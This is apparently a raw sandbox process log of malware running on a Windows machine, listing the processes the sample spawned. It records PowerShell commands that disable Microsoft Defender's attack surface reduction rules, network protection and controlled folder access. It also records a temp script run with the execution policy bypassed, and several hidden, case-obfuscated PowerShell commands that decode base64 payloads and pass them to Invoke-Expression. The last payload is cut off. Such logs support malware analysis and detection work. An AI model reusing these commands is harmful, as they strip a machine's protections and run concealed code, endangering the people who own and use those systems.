C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
48
4000
powershell.exe
3720
powershell.exe
powershell Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules_Actions Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
49
4568
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -EnableNetworkProtection Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
50
3756
powershell.exe
4568
powershell.exe
powershell Set-MpPreference -EnableNetworkProtection Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
51
4476
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
52
1360
powershell.exe
4476
powershell.exe
powershell Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
53
3372
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c powershell -ExecutionPolicy Bypass -F C:\Users\FD1HVy\AppData\Local\Temp\sad.ps1
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
54
5096
powershell.exe
3372
powershell.exe
powershell -ExecutionPolicy Bypass -F C:\Users\FD1HVy\AppData\Local\Temp\sad.ps1
C:\Users\FD1HVy\Desktop\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Process
55
3704
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABhAD0AIgBLAEMAZwBuAEwAaQBnAGcAUQAwAFoARgBKAHkAcwBuAFoAVQA1AFcASgB5AHMAbgBPAGkAYwByAEoAMgBOAFAAYgBYAE4AdwBKAHkAcwBuAFIAVwBOAGIATgBDAGMAcgBKAHkAdwB5AE4AQwB3AG4ASwB5AGMAeQBOAFYAMABuAEsAeQBjAHQAUwBpAGMAcgBKADIAOQBwAGIAaQBjAHIASgB6AGsAbgBLAHkAZAByAEoAeQBzAG4AUQBqAGwAcgBKAHkAcwBuAFEAaQBrAG8ASgB5AHMAbgBUAG0AVQBuAEsAeQBkADMATABVADkAQwBTAGsAVgBqAGQAQwBBAGcASgB5AHMAbgBVADMAbAB6AGQAQwBjAHIASgAwAFYATgBMAGkAYwByAEoAMABsAHYATABsAE4AMABjAG0AVgBCAGIAWABKAGwAUQBXAFIAbABKAHkAcwBuAGMAaQBnAG8ASQBFADUAbABkAHkAYwByAEoAeQAxAFAAUQBpAGMAcgBKADAAcABGAFkAMwBRAGcASgB5AHMAbgBhAFcAOABuAEsAeQBjAHUASgB5AHMAbgBRADIAOABuAEsAeQBkAE4AYwBGAEoARgBVAHkAYwByAEoAMwBOAEoAYgAyADQAdQBaAEcAVgBtAEoAeQBzAG4AVABDAGMAcgBKADAARQBuAEsAeQBkADAAWgBTAGMAcgBKADEATQBuAEsAeQBkADAASgB5AHMAbgBVAG0AVQBuAEsAeQBkAEIAVABTAGMAcgBKAHkAZwBnAEoAeQBzAG4AVwAxAE4AWgBKAHkAcwBuAFUAMwBRAG4ASwB5AGQARgBKAHkAcwBuAGIAUwA1AHAAYgB5ADUAdABSAFUAMQB2AGMAbgBsAHoASgB5AHMAbgBWAEYASgBsAFkAVQAxAGQAVwAzAE4AWgBjADEAUgBGAEoAeQBzAG4AYgBTADUARABiADIANQBXAEoAeQBzAG4AUgBWAEkAbgBLAHkAZABVAEoAeQBzAG4AWABUAG8ANgBaAGkAYwByAEoAMwBKAFAASgB5AHMAbgBiAFUASgBoAEoAeQBzAG4AYwAyAFUAMgBOAEYATgBVAEoAeQBzAG4AVQBrAGwAdQBaAHkAZwBuAEsAeQBjAGcASgB5AHMAbgBPAFcAcwBuAEsAeQBkAEMAUwBpAGMAcgBKADEAawAxAFQARQBSAHoAUwBYAGMAbgBLAHkAZABFAFIAVgBOADIAUgBTAGMAcgBKADIAMQBYAFYARgBZAG4ASwB5AGQAdgBTADIAMAAwAFYAbgBWAFIASgB5AHMAbgBNAGsAdwBuAEsAeQBkAEUAYgBrAFUAbgBLAHkAZABHAFYAMgBKAFIAUQAxAGcAbgBLAHkAZABoAFUAMABGAHQASgB5AHMAbgBRAHkAYwByAEoAMABOAHoAZABEAE4AYQBNAFgAZABYAE4ARABOAEkATwBHAFUAbgBLAHkAZABWAE4AVgBaAGgASgB5AHMAbgBTADMARQBuAEsAeQBkAGEAVABpAGMAcgBKADIAdAA1AFQAMwBSAFcAYgAwAGgARgBOAGkAYwByAEoAMABwAGEAYgBWAFIAQgBKAHkAcwBuAE8AQwBjAHIASgAyAFoAaABOAHoAZwAzAFMAawBWAHUAVgBTAGMAcgBKAHoAWgB5AFEAeQBjAHIASgB6AEkAbgBLAHkAZABGAEoAeQBzAG4ATgBVADEAcgBlAG4AUgBwAE8ARwBkAEUASgB5AHMAbgBkAEcAMQBYAFEAVQA0AHcATgBHAHgAdwBhAEgAcABqAGEAMAB4AG0AWgBHADUAUgBWAG4ATQBuAEsAeQBkAFgAYwAwAGwAUABOAFMAYwByAEoAMQBKADEAYQBVAFUAbgBLAHkAZABFAFYAbQBWADYAZQBHAGMAdwBUAEgASgBNAE8ARwBjAG4ASwB5AGQATABRAG4AVgB1AGUARwBGAEgATgAwAGgATwBkAGwAWQAzAEoAeQBzAG4AWgB5AGMAcgBKADEAawBuAEsAeQBkAGkAZABpAGMAcgBKADIAdwBuAEsAeQBjADMAYgBGAEkAbgBLAHkAYwAwAGQAWABOAG4ATQAzAEkAMQBNAEcAbABsAEwAMQBsAHcASgB5AHMAbgBUAEUAdABHAEoAeQBzAG4AVgBIAEIATQBKAHkAcwBuAFUAagBoAE0ASgB5AHMAbgBXAFgAcAB1AGIAbQBoAG8AUwBtAGQARgBKAHkAcwBuAFQAawBVAG4ASwB5AGQAMwBjAFcAVQBuAEsAeQBkAGgASgB5AHMAbgBiAGoAQgB2AE4AQwBjAHIASgAzAGwATgBkAG0ASgBMAFoARwBWADEAWgBpAGMAcgBKADIATgBNAGIARQBJAG4ASwB5AGQAVQBMADIAYwBuAEsAeQBkAEIAUABTAGMAcgBKAHoAbAByAFEAaQBBAHAATABGAHQAegBXAFMAYwByAEoAMQBOAFUAUgBTAGMAcgBKADAAMAB1AGEAUwBjAHIASgAyADgAbgBLAHkAYwB1AFkAeQBjAHIASgAyADkATgBVAEYASgBsAEoAeQBzAG4AYwAzAE4AcABKAHkAcwBuAGIAeQBjAHIASgAyADQAdQBZADIAOQBOAEoAeQBzAG4AVQBGAEoARgBjAHkAYwByAEoAMwBOAHAAYgB5AGMAcgBKADAANQB0AGIAMgBSAGwAWABUAG8ANgBaAEUAVgBEAFQAMAAxAFEAYwBtAFYAVABjAHkAYwByAEoAeQBrAHAASQBDAGMAcgBKAHkAeABiAFUAMwBrAG4ASwB5AGQAegBkAEcAVgBOAEwAbABRAG4ASwB5AGQAbABlAEgAUQB1AFIAVwA1AGoAYgB5AGMAcgBKADAAUgBwAGIAbQBjAG4ASwB5AGQAZABPAGoAcABoAFUAMABOAEoAUwBTAGsAcABMAGwASQBuAEsAeQBkAEYASgB5AHMAbgBZAFMAYwByAEoAMABSADAAVAAyAFYATwBaAEMAYwByAEoAeQBnAGcASgB5AHMAbgBLAFMAYwBwAEkAQwAxAHkAUgBYAEIAcwBRAFcATgBsAEkAQwBoAGIAUQAyAGgAaABjAGwAMAAyAE4AeQB0AGIAUQAyAGgAaABjAGwAMAAzAE0AQwB0AGIAUQAyAGgAaABjAGwAMAAyAE8AUwBrAHMAVwAwAE4AbwBZAFgASgBkAE0AegBZAHQAYwBrAFYAdwBiAEUARgBqAFoAUwBjADUAYQAwAEkAbgBMAEYAdABEAGEARwBGAHkAWABUAE0ANQBLAFMAQgA4AEoAaQBnAGcASgBFAFYAdQBkAGoAcABqAGIAMAAxAHoAYwBFAFYARABXAHoAUQBzAE0AagBRAHMATQBqAFYAZABMAFcAcABQAFMAVwA0AG4ASgB5AGsAPQAiAA0ACgAkAGIAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABhACkAKQANAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABiAA==
쩘Z໒
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
56
2320
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABjAD0AIgBKAGkAQQBvAEkAQwBSAFQAUwBHAFYATQBiAEUAbABrAFcAegBGAGQASwB5AFIAegBhAEUAVgBzAGIARQBsAGsAVwB6AEUAegBYAFMAcwBuAGUAQwBjAHAASwBDAGcAbgBLAEUANQBsAEoAeQBzAG4AVgB5AGMAcgBKAHkAMQBQAFEAbQBvAG4ASwB5AGQAbABRAHkAYwByAEoAMQBRAGcAYQBXADgAdQBKAHkAcwBuAFEAMgA5AHQAVQBIAEoAbABjADEATgBKAFQAMAA0AHUAWgBDAGMAcgBKADAAVgBtAEoAeQBzAG4AYgBHAEYAMABaAFMAYwByAEoAMQBOADAASgB5AHMAbgBVAG0AVgBoAFQAUwBoAGIAYQBXADgAdQBUAFMAYwByAEoAMgBWAHQAVAAxAEoANQBKAHkAcwBuAGMAMQBRAG4ASwB5AGQAUwBaAFUARQBuAEsAeQBkAE4AWABTAGMAcgBKAHkAQgBiAGMAMQBrAG4ASwB5AGQAVABkAEUAVgB0AEwAawBOAHYAYgBpAGMAcgBKADEAWQBuAEsAeQBkAGwAVQBuAFIAZABPAGkAYwByAEoAegBwAG0ASgB5AHMAbgBjAGkAYwByAEoAMgA4AG4ASwB5AGQATgBRAGsARgBUAEoAeQBzAG4AUgBTAGMAcgBKAHoAWQAwAEoAeQBzAG4AYwAzAFIAUwBTAFMAYwByAEoAMgA1AEgASgB5AHMAbgBLAEMAQQBuAEsAeQBkAHQAZQBHAHcAbgBLAHkAZABJAEoAeQBzAG4AVgBUAGQAMABSAEgATQBuAEsAeQBkAEoASgB5AHMAbgBaAHkAYwByAEoAMABSAEkAZAAxAFoAMwBaAHkAOABuAEsAeQBkAGEAUgBXAGwAbQBKAHkAcwBuAGEAWABSADUASgB5AHMAbgBXAGkAYwByAEoAegBjAG4ASwB5AGQASABRAGkAYwByAEoAMwBsAG4AVQB5AGMAcgBKADMAaAAzAGEAMwBjAHIAYgBHAGsAbgBLAHkAZAAzAEoAeQBzAG4ATgAzAFEAMwBNADEAawByAE4AegBCAHAASgB5AHMAbgBkAFQAawAyAEoAeQBzAG4ATgBuAEUAbgBLAHkAZABUAEoAeQBzAG4AZABFAE0AcgBNAEUAcwBuAEsAeQBjAHkAVQBVAHQAaQBXAFgAUgB6AFoAMgB3AG4ASwB5AGQAQgBKAHkAcwBuAFkAbABBAG4ASwB5AGMAegBkAFMAYwByAEoAegBGAFcAYQBHADQAbgBLAHkAZAB2AFcAQwA4AG4ASwB5AGQAMwBTADIARgBSAGUAWABFAG4ASwB5AGQARwBjAEYAZwBuAEsAeQBkAFQASgB5AHMAbgBTAEYASgBrAFMAawBKAHAAZABtADEAVgBUADIAZwBuAEsAeQBkAFQASgB5AHMAbgBOAGsAWgB5AGIAMwBsAEsASgB5AHMAbgBkAEcAcwAwAFMARQBaAEgAWgAxAEUANABiAFUASgB6AGMAQwBjAHIASgAzAEIATgBWAGoATgBqAGMARgBkAHAAUQB5AGMAcgBKADIATgB2AEoAeQBzAG4AYQAyAFIAbQBlAFUARgBJAEoAeQBzAG4ASwAwAGcAbgBLAHkAZABoAEoAeQBzAG4AUwB6AGwANgBVAGsAWgA0AEoAeQBzAG4AZAAyAHgAMABKAHkAcwBuAFoAQwBjAHIASgAzAGQATwBZAGwARQBuAEsAeQBkAEIATwBUAEkAMQBiAFMAYwByAEoAMQBOAE8ASgB5AHMAbgBWAFMAYwByAEoAMAB0AHAAUQAyAFkAbgBLAHkAZAAzAGIAeQBjAHIASgAxAGMAbgBLAHkAZAB1AFoAMABJAG4ASwB5AGMAegBUADIAdABZAEoAeQBzAG4AZAAwADQAMwBMADEAUgBoAFEAaQBjAHIASgB5AHQAbABKAHkAcwBuAGIARgBjADEAZAAwAEUAbgBLAHkAZAB3AEoAeQBzAG4AWgBDAGMAcgBKADIAZwBuAEsAeQBjAHYAVABXADUAYQBkAFMAYwByAEoAMwBGAEgAVQBGAGwAMgBKAHkAcwBuAFUAVgBwAFIAWgBsAFYAbQBiAFgAaABzAEsAUwB4AGIAYwAxAGsAbgBLAHkAZABUAGQAQwBjAHIASgAwAFYATgBMAG0AbABQAEwAbQBOAHYAYgBTAGMAcgBKADMAQgB5AEoAeQBzAG4AWgBTAGMAcgBKADEATgB6AFMAVQA4AG4ASwB5AGQAdQBMAGsATgB2AFQAWABCAFMAUgBYAE4AVABhAFMAYwByAEoAMAA4AG4ASwB5AGQAdQBUAFUAOQBrAEoAeQBzAG4AUgBTAGMAcgBKADEAMAA2AEoAeQBzAG4ATwBpAGMAcgBKADAAUgBsAEoAeQBzAG4AWQAwADgAbgBLAHkAZABOAFUAQwBjAHIASgAzAEkAbgBLAHkAZABsAFUAeQBjAHIASgAzAE0AbgBLAHkAYwBwAFMAegBNAG4ASwB5AGQATgBKAHkAcwBuAEkAQwBjAHIASgAwAFoAdgBjAGkAYwByAEoAMABWAGgAUQB5AGMAcgBKADAAZwBnAGUAMAA0AG4ASwB5AGQAbABKAHkAcwBuAFYAeQAxAFAASgB5AHMAbgBRAGkAYwByAEoAMgBwAGwAUQAxAFEAZwBJAEMAYwByAEoAMgBsAHYASgB5AHMAbgBMAGwATgBVAFUAaQBjAHIASgAwAFUAbgBLAHkAZABoAFQAWABKAGwAWQBXAFEAbgBLAHkAZABsAEoAeQBzAG4AYwBpAGMAcgBKAHkAZwBuAEsAeQBjAGcAVwBUAEoATgBKAHkAcwBuAFgAeQB3AGcAVwAzAE4ANQBKAHkAcwBuAFUAMwBSAGwAYgBTAGMAcgBKAHkANQAwAEoAeQBzAG4AWgBWAGgAVQBMAG0AVgB1AFkAMAA4AG4ASwB5AGQAawBTAFUANABuAEsAeQBkAEgAWABUAG8ANgBRAFMAYwByAEoAMQBNAG4ASwB5AGQAagBTAFUAawBnAEsAWAAwAHAASgB5AHMAbgBMAGkAYwByAEoAMwBJAG4ASwB5AGQARgBZAFUAUgBVAEoAeQBzAG4AYgAyAFYATwBKAHkAcwBuAFoAQwBnAGcASwBTAEEAbgBLAHkAZABMAE0AMAAwAGcATABpAGMAcgBKAHkAZwBnAFcAVABKAE4AYwBIAE4AbwBUADAAMABuAEsAeQBkAGwAVwB5AGMAcgBKAHoAUgBkAEsAMQBrAHkAVABWAEIAegBTAEMAYwByAEoAMgA5AE4AWgBWAHMAbgBLAHkAYwB6AE0ARgAwAHIAYgBYAGcAbgBLAHkAZABzAGUAQwBjAHIASgAyADEANABKAHkAcwBuAGIAQwBrAG4ASwBTADUAUwBaAFgAQgBzAFkAVwBOAGwASwBDAGgAYgBZADAAaABoAGMAbAAwAHgATQBEAGsAcgBXADIATgBJAFkAWABKAGQATQBUAEkAdwBLADEAdABqAFMARwBGAHkAWABUAEUAdwBPAEMAawBzAFcAMQBOADAAVQBtAGwATwBSADEAMQBiAFkAMABoAGgAYwBsADAAegBPAFMAawB1AFUAbQBWAHcAYgBHAEYAagBaAFMAZwBvAFcAMgBOAEkAWQBYAEoAZABPAEQAawByAFcAMgBOAEkAWQBYAEoAZABOAFQAQQByAFcAMgBOAEkAWQBYAEoAZABOAHoAYwBwAEwAQwBjAGsASgB5AGsAdQBVAG0AVgB3AGIARwBGAGoAWgBTAGcAbwBXADIATgBJAFkAWABKAGQATgB6AFUAcgBXADIATgBJAFkAWABKAGQATgBUAEUAcgBXADIATgBJAFkAWABKAGQATgB6AGMAcABMAEYAdABUAGQARgBKAHAAVABrAGQAZABXADIATgBJAFkAWABKAGQATQBUAEkAMABLAFMAQQBwACIADQAKACQAZAAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGMAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGQA
ჺ
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
57
3996
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABlAD0AIgBLAEMAYwBvAGIAawBWADMATABVADkAaQBhAGsAVQBuAEsAeQBkAGoAVgBDAEEAZwBKAHkAcwBuAGEAVQA4AHUASgB5AHMAbgBjADMAUgB5AFIAVQBFAG4ASwB5AGQAdABVAGkAYwByAEoAMgBVAG4ASwB5AGQAQgBaAEUAVQBuAEsAeQBkAFMASgB5AHMAbgBLAEMAQQBvAGIAawBWADMATABVADkAaQBhAGsAVgBqAFYAQwBjAHIASgB5AEIAcABiAHkANQBEAFQAMAAxAHcAVQBtAFUAbgBLAHkAZAB6AFUAMABsAHYAYgBpAGMAcgBKAHkANQBrAFoAUwBjAHIASgAyAFoAcwBRAFMAYwByAEoAMQBSAEYAVQAzAFIAeQBaAFUARgB0AEsARgBzAG4ASwB5AGQAegBXAFYATgBVAFIAVQAwAHUASgB5AHMAbgBTAFMAYwByAEoAMAA4AHUAVABXAFYATgBiAHkAYwByAEoAMQBKAFoAVQAxAFIAeQBKAHkAcwBuAFoAUwBjAHIASgAyAEYAdABYAFYAdABUAFcAWABOADAASgB5AHMAbgBSAFcAMAB1AFkAeQBjAHIASgAyADkAdQBKAHkAcwBuAGQAaQBjAHIASgAwAFYAeQBkAEYAMAA2AE8AbQBZAG4ASwB5AGQAUwBUADIAMQBDAFEAWABOAGwASgB5AHMAbgBOAGoAUgB6AGQASABKAEoAVABpAGMAcgBKADAAYwBvAEkARgBBAG4ASwB5AGQAVQBNAEUAcABaAE4AMQBKAEUASgB5AHMAbgBjADAAbABuAFIAQwBjAHIASgAwAFUAbgBLAHkAZABXAEwAMgBoAG0AUQBXAGQAWABLADAAeABqAE0ARQBzAG4ASwB5AGQAdQBKAHkAcwBuAFYAQwBjAHIASgAxAHAARABLAHkAcwByAGUARQBaAHIAWgAwAHAATABOAEcAdABaAFIARgBKAGEAVgBUAE0AbgBLAHkAYwB2AE0AMQBoAFoAYgBTAGMAcgBKADIATgBEAEoAeQBzAG4ATAAxAEUAeQBNAFUAMAB5AGEARgBsAFIAUgBIAGQAbwBKAHkAcwBuAE4AVQBKAEoAZQBsAEYAdgBVAG0AVgBYAEoAeQBzAG4AVgBsAFUAeABkAG0AdwA0AEoAeQBzAG4AYwB6AGQATwBOAFUAMQB0AFMARQBZAG4ASwB5AGMAMQBiAFYAQgB4AGEARgBOAEcAYwBXAGMAbgBLAHkAZABqAEoAeQBzAG4ATQBpAGMAcgBKADAATgBUAE0AMABOAHQAVgBHADgAbgBLAHkAZABoAGEAQwBjAHIASgAwAE0AbgBLAHkAZABPAGUAUwBjAHIASgAzAFYANgBOAEcAZwB3AEoAeQBzAG4AVABrAG8AdwBNAEQARgBVAGMAawBVAG4ASwB5AGQARABOAFUAMQBaAEoAeQBzAG4ATgBpAGMAcgBKADEAcAB0AFQAawBrAG4ASwB5AGQAbQBNAFMAYwByAEoAMgBZAG4ASwB5AGQAMwBjAFcANQBQAE4AVgBOAFcAUgBuAGQAUwBUAG4AWgBpAE0ARQBzAG4ASwB5AGQAMwBkAEcAUgA0AE4AbQBrAHgASgB5AHMAbgBVAEQAZABWAGIAaQBjAHIASgAzAGwAcgBNAGwARgBaAGMAbQBGAG4AUwBEAGgAagBiAGwAbwB5AEoAeQBzAG4AUgBFAFoATgBPAFUASgBKAEoAeQBzAG4AVgB5AGMAcgBKADMAZwBuAEsAeQBjAHgAUgAwADkAcABZAHkAYwByAEoAMQBSAGEAZABGAGgASQBPAFUAdAB6AGIAQwBjAHIASgAwAE0AbgBLAHkAZABsAEoAeQBzAG4ATQBDAGMAcgBKADEAYwB4AGEAbABOAGEASgB5AHMAbgBPAFgAZwBuAEsAeQBjAHkAVQBXAFUAMQBVAEUAZwBuAEsAeQBkAE0ASgB5AHMAbgBVAG0ATgBRAFMAaQBjAHIASgB6AEIAagBKAHkAcwBuAGQAeQBjAHIASgB6AFUAbgBLAHkAYwB3AFQAeQBjAHIASgAwAFkAcgBWAFMAYwByAEoAeQB0AFYAVQBDAGMAcgBKADEAQgBVAE0AQwBrAHMASQBGAHQAegBlAFYATgBVAFoAUwBjAHIASgAyADAAdQBTAFcAOAB1AFEAMAA5AHQAVQBGAEoAbABjADMATgBKAGIAeQBjAHIASgAwADQAdQBRADAAOQBOAGMARgBJAG4ASwB5AGQAbABVADMATgBwAGIAMgA0AG4ASwB5AGQAdABiAHkAYwByAEoAMgBSAEYAWABUAG8ANgBKAHkAcwBuAFoARQBWAEQASgB5AHMAbgBUADAAMQBRAGMAawBWAHoASgB5AHMAbgBjAHkAawBwAEoAeQBzAG4ASQBDAHcAbgBLAHkAZABiAFUAMwBsAFQASgB5AHMAbgBkAEcAVgBOAEwAbABSAEYAZQBIAFEAbgBLAHkAYwB1AFIAVwA1AEQAYgAwAFIASgBiAGsAYwBuAEsAeQBkAGQATwBqAHAAaABVADIATgBKAGEAUwBrAHAATABpAGMAcgBKADEASQBuAEsAeQBkAGwASgB5AHMAbgBRAFUAUgAwAFQAeQBjAHIASgAwAFYAdQBaAEMAZwBwAEoAeQBzAG4ATwBIAFIATwBKAGkAYwByAEoAeQBBAG8ASQBIAGwAawBKAHkAcwBuAFkAMABWAHUAZABqAHAAagBUADAAMABuAEsAeQBkAFQAVQBFAFYARABXAHkAYwByAEoAegBRAHMATQBqAFEAcwBNAGkAYwByAEoAegBWAGQATABXAHAAUABTAFcANABuAEsAeQBkAFEASgB5AHMAbgBWAEQAQgBRAFYARABBAHAASgB5AGsAdQBjAGsAVgB3AGIARQBGAEQAWgBTAGcAbgBlAFcAUgBqAEoAeQB3AG4ASgBDAGMAcABMAG4ASgBGAGMARwB4AEIAUQAyAFUAbwBKADEAQgBVAE0AQwBjAHMAVwAzAE4AVQBjAG0AbABPAFIAMQAxAGIAUQAwAGgAaABVAGwAMAB6AE8AUwBrAHUAYwBrAFYAdwBiAEUARgBEAFoAUwBnAG4ATwBIAFIATwBKAHkAdwBuAGYAQwBjAHAAZgBHAGwAbABXAEEAPQA9ACIADQAKACQAZgAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAGYA
䠨W젂Z
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Process
58
2304
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JABnAD0AIgBLAEMAZwBuAEoAaQBnAGcAZQB6AEUAbgBLAHkAZAA5AGMASABNAG4ASwB5AGQAbwBUADAAMQBGAFcAegBSAGQASwAzAHMAeABKAHkAcwBuAGYAWABCAHoAUwBHADkATgBaAFYAcwB6AE0ARgAwAHIAZQB5AGMAcgBKAHoAQgA5AFcASABzAHcAZgBTAGsAZwBLAEcANQBGAGQAeQAwAG4ASwB5AGQAUABZAG0AbwBuAEsAeQBkAEYAWQAxAFEAZwBVADMAbAB6AFYARQBWAHQASgB5AHMAbgBMAGsAbAB2AEwAbABOAFUAYwBtAFUAbgBLAHkAZABoAEoAeQBzAG4AVABYAEoARgBRAFcAUgBGAGMAaQBnAG8ASQBHADUARgBkAHkAMQBQAFkAbQBwAEYAWQAxAFEAZwBhAFUAOABuAEsAeQBjAHUAWQAwADkATgBVAEMAYwByAEoAMwBKAGwAVQAzAE0AbgBLAHkAZABwAGIAeQBjAHIASgAwADQAdQBKAHkAcwBuAFoARQBWAG0AVABHAEYAVQBSAFgATgAwAGMAaQBjAHIASgAwAFYAaABiAFMAZwBnAFcAMQBOAFoAYwAzAFIAbABiAFMANQBKAGIAeQA0AG4ASwB5AGQATgBSAFcAMQBQAGMAbABsAHoAZABGAEoARgBZAFUAMQBkAEoAeQBzAG4ASQBGAHQAegBlAFYATgAwAEoAeQBzAG4AWgBXADAAdQBZADIAOQB1AGQAawBWAFMASgB5AHMAbgBWAEYAMAA2AE8AaQBjAHIASgAwAFkAbgBLAHkAZAB5AGIAMgAxAGkAUQBWAE4AbABOAGoAUgBUAGQARgBJAG4ASwB5AGQASgBiAG0AYwBvAEkAQwBjAHIASgAzAHMAdwBmAFUAaABaAE0AWABKAEUAYwAwAGwAbgBSAFUAbABUAGQAbgBNAG4ASwB5AGQAMQBSAHkAYwByAEoAMABoADAAUwBXAHQAVwBjAHkAYwByAEoAMgBJADIAVgBDAGMAcgBKADAAZwBuAEsAeQBkAG4ASgB5AHMAbgBXAGkAYwByAEoAMAB4AFYAVQBrADEATQBRADEAWgBvAGQARQBwAE8AZQBtAFEAeQBVADIASQBuAEsAeQBkAHoAZQBpAGMAcgBKADMAVQBuAEsAeQBkADYAYwBsAGsAeABWADAAcAB5AEoAeQBzAG4AUgBYAFIAMQBKAHkAcwBuAFUAegBrADIASgB5AHMAbgBWAG4AWgBEAE0AbQBsAGoAVgBFAG8AbgBLAHkAZAAwAGEARw